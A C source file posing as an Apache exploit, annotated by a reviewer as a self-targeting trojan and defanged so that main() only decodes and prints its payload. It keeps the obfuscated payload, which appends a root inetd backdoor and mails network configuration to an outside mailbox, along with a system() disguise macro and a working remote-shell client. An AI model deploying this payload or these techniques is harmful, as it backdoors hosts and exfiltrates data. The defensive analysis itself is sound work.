/*
      Private Apache Xploit
      ---------------------	

      WARNING (review): this file is a trojan, not an Apache exploit.  Nothing
      in it speaks HTTP or touches Apache.  The "shellcode" below is a shell
      command line encoded by adding 53 to every byte; main() subtracts the
      offset back off and hands the result to system() -- disguised behind the
      `pmap_proc_p` macro -- on the machine of whoever runs this program, before
      any network traffic to the "target".  Decoded, the command appends a
      root shell on TCP/65139 to /etc/inetd.conf, SIGHUPs inetd, and mails the
      output of `ifconfig -a` to an external mailbox.  The "affected versions"
      range below does not correspond to any Apache 1.3 release.  Do not
      compile or run this as-is.

      NO DISTRIBUTE!!!!!	


      Affected Apache Versions : 1.3.7-1.3.9.12

      Tested :

	Red Hat 5.x, 6.x, 7.x
	Debian 2.2-3.0
	Slackware 8.0
	Suse 7.3Beta
	Mandrake 8.0		
	Windows Apache 1.3 Beta
   
 
	Coded by k2!!

	greets effnet #!adm, #phrack	


ADM 0WN YOU!
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/types.h>


/* Unused.  No stack-smashing payload is ever assembled in this file; NOP and
 * RET exist only to make the listing look like a buffer-overflow exploit. */
#define NOP     0x90
#define RET     0xbfffec90
/* Port rshell() connects to on the host named on the command line.  This is
 * NOT the port the encoded payload below opens -- that one is 65139, on the
 * machine that runs this program. */
#define PORT    5760
/* Disguise: every call to pmap_proc_p() in this file is a call to system(3).
 * The "portmapper procedure" name is misdirection. */
#define pmap_proc_p system


/* Not machine code.  Each byte is an ASCII character plus 53; subtracting
 * `offset` (53, see main()) from every byte yields, exactly, the shell line
 *
 *   /bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ;
 *   /bin/killall -1 inetd 2>&1 1>/dev/null ;
 *   /sbin/ifconfig -a | mail goat187@hotmail.com 2>&1 2>/dev/null
 *
 * i.e. a root inetd backdoor on TCP/65139 plus exfiltration of the local
 * network configuration.  Anything that passes the decoded string to
 * system() -- as the original main() did through `pmap_proc_p` -- backdoors
 * the host it runs on, not a remote Apache server.  The encoded string is 179
 * bytes long and carries no terminator of its own. */
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";


/* Larger of two ints.  When they are equal, y is returned (as before). */
int max(int x, int y)
{
        return (y < x) ? x : y;
}


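/* Write all `len` bytes of `buf` to `fd`, retrying on EINTR and completing
 * short writes.  Returns 0 on success, -1 with errno set on failure. */
static int write_all(int fd, const char *buf, size_t len)
{
        while (len > 0) {
                ssize_t w = write(fd, buf, len);
                if (w < 0) {
                        if (errno == EINTR)
                                continue;
                        return -1;
                }
                buf += w;
                len -= (size_t)w;
        }
        return 0;
}

/*
 * Interactive TCP relay: connect to host:PORT (5760) and shuttle bytes
 * between stdin/stdout and the socket until either side closes.
 *
 * NOTE(review): nothing in this file makes anything listen on port 5760 on
 * `host`; the encoded payload elsewhere in the file targets TCP/65139 on the
 * machine that runs the program.  The original printed "root shell found!"
 * on a bare successful connect(), which the code cannot know, so that message
 * is now a plain connection notice.
 *
 * Fixes over the original:
 *  - the gethostbyname() result is actually used; the original resolved the
 *    name and then called inet_addr(host) anyway, whose INADDR_NONE failure
 *    for any non-dotted-quad host went unchecked;
 *  - socket reads leave room for a terminator and the data is written out
 *    with its exact length, so a full 1024-byte read can no longer make the
 *    fputs() of the original run off the end of recvln;
 *  - EOF on stdin half-closes the socket and stops polling stdin instead of
 *    spinning in select() on a permanently readable descriptor;
 *  - write() results are checked and short writes are completed.
 *
 * host: hostname or dotted-quad to connect to.
 * Never returns: exit(-1) on any error, exit(0) when the peer closes.
 */
void rshell(char *host)
{
        struct hostent *hp = gethostbyname(host);
        if (hp == NULL) {
                fprintf(stderr, "gethostbyname: cannot resolve %s\n", host);
                exit(-1);
        }

        struct sockaddr_in peer;
        if (hp->h_addrtype != AF_INET ||
            (size_t)hp->h_length != sizeof(peer.sin_addr)) {
                fprintf(stderr, "gethostbyname: %s is not an IPv4 host\n", host);
                exit(-1);
        }

        int sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0) {
                perror("socket");
                exit(-1);
        }

        memset(&peer, 0, sizeof(peer));
        peer.sin_family = AF_INET;
        peer.sin_port = htons(PORT);
        memcpy(&peer.sin_addr, hp->h_addr_list[0], sizeof(peer.sin_addr));
        if (connect(sockfd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
                perror("connect");
                exit(-1);
        }
        printf("connected to %s:%d\n", host, PORT);

        /* Same initial probe the original sent on connect. */
        static const char probe[] = "uname -a; pwd; id;\n";
        if (write_all(sockfd, probe, sizeof(probe) - 1) < 0) {
                perror("write");
                exit(-1);
        }

        char sendln[1024], recvln[1024];
        fd_set rset;
        int stdin_open = 1;
        int maxfd = (sockfd > STDIN_FILENO ? sockfd : STDIN_FILENO) + 1;

        for (;;) {
                /* select() rewrites the set, so rebuild it every round. */
                FD_ZERO(&rset);
                FD_SET(sockfd, &rset);
                if (stdin_open)
                        FD_SET(STDIN_FILENO, &rset);

                if (select(maxfd, &rset, NULL, NULL, NULL) < 0) {
                        if (errno == EINTR)
                                continue;
                        perror("select");
                        exit(-1);
                }

                if (stdin_open && FD_ISSET(STDIN_FILENO, &rset)) {
                        if (fgets(sendln, sizeof(sendln), stdin) == NULL) {
                                /* EOF/error on our side: tell the peer we are
                                 * done sending, keep draining its output. */
                                stdin_open = 0;
                                shutdown(sockfd, SHUT_WR);
                        } else if (write_all(sockfd, sendln, strlen(sendln)) < 0) {
                                perror("write");
                                exit(-1);
                        }
                }

                if (FD_ISSET(sockfd, &rset)) {
                        ssize_t n = read(sockfd, recvln, sizeof(recvln) - 1);
                        if (n == 0) {
                                printf("Connection closed.\n");
                                exit(0);
                        }
                        if (n < 0) {
                                if (errno == EINTR)
                                        continue;
                                perror("read");
                                exit(-1);
                        }
                        recvln[n] = '\0';
                        /* Emit exactly the bytes read: embedded NULs pass
                         * through and nothing beyond what read() filled is
                         * touched. */
                        fwrite(recvln, 1, (size_t)n, stdout);
                        fflush(stdout);
                }
        }
}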


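/*
 * Entry point.
 *
 * SECURITY (review): the original body subtracted `offset` (53) from every
 * byte of `shellcode` and passed the result to system() -- hidden behind the
 * `pmap_proc_p` macro -- before doing anything with the "target".  Decoded,
 * that string is a shell command line that appends a root shell on TCP/65139
 * to /etc/inetd.conf, SIGHUPs inetd, and mails `ifconfig -a` to an external
 * mailbox: the program was a trojan aimed at its own user.  This version
 * keeps only the decoding step, prints the result with non-printable bytes
 * escaped so it can be inspected, and never executes it or connects anywhere.
 *
 * Other defects removed: exit()/malloc() were called with no prototype; the
 * 154-byte allocation was unchecked and smaller than the 179-byte payload,
 * which was also never NUL-terminated before being handed to system(); the
 * [offset] argument advertised in the usage string was never parsed; and the
 * function ended with strcpy() into an uninitialised pointer.
 *
 * argv[1]  accepted for command-line compatibility but no longer used (the
 *          original opened an interactive connection to argv[1]:5760).
 * argv[2]  optional decode offset in 0..255, default 53.
 *
 * Returns 0 after printing the decoded payload, 1 on bad arguments or
 * allocation failure.
 */
int main(int argc, char **argv)
{
        long offset = 53;

        if (argc < 2) {
                printf("usage: %s <ip> [offset]\n", argv[0]);
                return 1;
        }
        if (argc > 2) {
                char *end;
                errno = 0;
                offset = strtol(argv[2], &end, 10);
                if (end == argv[2] || *end != '\0' || errno == ERANGE ||
                    offset < 0 || offset > 255) {
                        fprintf(stderr, "offset must be an integer in 0..255\n");
                        return 1;
                }
        }

        /* Decode into a properly sized, NUL-terminated buffer.  The arithmetic
         * is done on unsigned bytes and wrapped to 8 bits so the result does
         * not depend on whether `char` is signed. */
        size_t len = strlen(shellcode);
        char *decoded = malloc(len + 1);
        if (decoded == NULL) {
                perror("malloc");
                return 1;
        }
        for (size_t i = 0; i < len; i++) {
                unsigned int b = (unsigned char)shellcode[i];
                decoded[i] = (char)((b - (unsigned int)offset) & 0xffu);
        }
        decoded[len] = '\0';

        /* Show the payload; it is NOT executed and no connection is made. */
        printf("decoded payload (%zu bytes, offset %ld) -- NOT executed:\n",
               len, offset);
        for (size_t i = 0; i < len; i++) {
                unsigned char c = (unsigned char)decoded[i];
                if (c >= 0x20 && c < 0x7f)
                        putchar(c);
                else
                        printf("\\x%02x", c);
        }
        putchar('\n');

        free(decoded);
        return 0;
}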



